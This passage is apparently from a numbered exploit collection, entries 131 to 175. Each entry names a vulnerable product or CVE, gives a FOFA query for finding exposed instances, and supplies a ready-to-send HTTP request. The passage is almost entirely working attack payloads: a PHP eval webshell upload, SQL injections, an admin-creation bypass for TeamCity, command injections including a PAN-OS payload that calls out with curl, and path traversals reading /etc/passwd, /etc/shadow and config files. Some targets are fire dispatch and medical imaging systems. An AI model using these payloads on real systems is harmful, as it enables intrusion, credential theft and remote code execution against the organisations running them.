------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py
133. H5 Cloud Mall (H5云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (科立迅) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kirisun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD
144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed (base64-encoded)
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD
149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is returned at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 operating system command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达医学影像存档与通信系统 (INFINITT PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 (HD licence-plate recognition camera) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
